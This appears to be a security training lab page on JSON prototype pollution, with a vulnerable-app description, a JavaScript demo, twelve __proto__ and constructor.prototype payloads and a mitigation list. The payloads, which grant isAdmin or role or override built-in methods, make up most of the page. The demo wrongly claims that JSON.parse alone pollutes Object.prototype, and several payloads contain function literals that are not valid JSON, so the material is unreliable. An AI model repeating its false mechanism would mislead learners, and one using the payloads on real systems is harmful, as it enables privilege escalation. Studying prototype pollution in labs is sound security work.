Lab 2: Prototype Pollution with JSON

Difficulty: Medium

Lab Overview

This lab demonstrates prototype pollution vulnerabilities that occur when using JSON.parse() to process untrusted JSON data. Attackers can inject malicious prototype properties through JSON input.

Objective: Understand how JSON-based prototype pollution attacks work and how to exploit them.

Vulnerable Application

API Configuration Parser

This application processes JSON configuration data from API requests. Try to exploit prototype pollution vulnerabilities:

JSON Prototype Pollution Tester

⚠️ JSON Prototype Pollution Warning

This lab demonstrates JSON-based prototype pollution vulnerabilities:

JSON.parse() - Unsafe JSON parsing
__proto__ - Direct prototype access
constructor - Constructor property access
No validation - Missing input validation

JSON Attack Vectors

These JSON properties can be exploited for prototype pollution:

__proto__ - Direct prototype access
constructor - Constructor property access
prototype - Prototype property access
constructor.prototype - Nested prototype access

JSON Prototype Pollution Demo

JavaScript JSON Prototype Pollution Demonstration:

This demonstrates how JSON.parse() can lead to prototype pollution:

// Vulnerable function that uses JSON.parse function processConfig(jsonString) { const config = JSON.parse(jsonString); return config; } // Attacker input const maliciousJSON = '{"__proto__": {"isAdmin": true, "role": "admin"}}'; // Parse the malicious JSON const config = processConfig(maliciousJSON); // Now all objects have polluted prototype console.log({}.isAdmin); // true console.log({}.role); // "admin" // Even new objects are affected const newObj = {}; console.log(newObj.isAdmin); // true

The demo above shows how JSON.parse() can lead to prototype pollution affecting all objects.

Processing Results

Processing Results:

No input processed yet

Vulnerability Details

Type: JSON Prototype Pollution
Severity: Medium
Method: JSON.parse() exploitation
Issue: Unsafe JSON parsing

Attack Vectors

JSON.parse(): Unsafe JSON parsing
__proto__ Access: Direct prototype modification
Constructor Access: Constructor property manipulation
Nested Access: Deep prototype manipulation

JSON Prototype Pollution Examples

Use these techniques to exploit JSON-based prototype pollution vulnerabilities:

1. Basic JSON proto Pollution:

{
  "__proto__": {
    "isAdmin": true,
    "role": "admin",
    "permissions": ["read", "write", "delete"]
  }
}

2. JSON Constructor Pollution:

{
  "constructor": {
    "prototype": {
      "isAdmin": true,
      "role": "admin"
    }
  }
}

3. JSON Nested Prototype Pollution:

{
  "constructor": {
    "prototype": {
      "constructor": {
        "prototype": {
          "isAdmin": true
        }
      }
    }
  }
}

4. JSON Array Prototype Pollution:

{
  "__proto__": {
    "push": function() { return "hacked"; },
    "length": 999
  }
}

5. JSON Function Prototype Pollution:

{
  "__proto__": {
    "toString": function() { return "hacked"; },
    "valueOf": function() { return 0; }
  }
}

6. JSON Object Prototype Pollution:

{
  "__proto__": {
    "hasOwnProperty": function() { return true; },
    "toString": function() { return "hacked"; }
  }
}

7. JSON Date Prototype Pollution:

{
  "__proto__": {
    "getTime": function() { return 0; },
    "toString": function() { return "hacked"; }
  }
}

8. JSON String Prototype Pollution:

{
  "__proto__": {
    "charAt": function() { return "hacked"; },
    "length": 999
  }
}

9. JSON Number Prototype Pollution:

{
  "__proto__": {
    "valueOf": function() { return 0; },
    "toString": function() { return "hacked"; }
  }
}

10. JSON Boolean Prototype Pollution:

{
  "__proto__": {
    "valueOf": function() { return true; },
    "toString": function() { return "hacked"; }
  }
}

11. JSON Complex Nested Pollution:

{
  "data": {
    "__proto__": {
      "isAdmin": true
    }
  },
  "config": {
    "constructor": {
      "prototype": {
        "role": "admin"
      }
    }
  }
}

12. JSON Array of Objects Pollution:

[
  {
    "__proto__": {
      "isAdmin": true
    }
  },
  {
    "constructor": {
      "prototype": {
        "role": "admin"
      }
    }
  }
]

Real-World Attack Scenarios

API configuration manipulation and privilege escalation
Data manipulation and corruption
Application logic bypass
Denial of Service (DoS) attacks
Compliance violations and security breaches
Cross-site attacks and data exfiltration

Mitigation Strategies

Validate JSON input before parsing
Use Object.create(null) for safe objects
Implement proper input sanitization
Use Object.freeze() to prevent modifications
Regular security testing and vulnerability assessments
Monitor for unusual object behavior
Implement proper authentication and authorization
Use secure coding practices
Implement rate limiting and request validation
Educate developers about prototype pollution
Use safe JSON parsing libraries
Implement proper error handling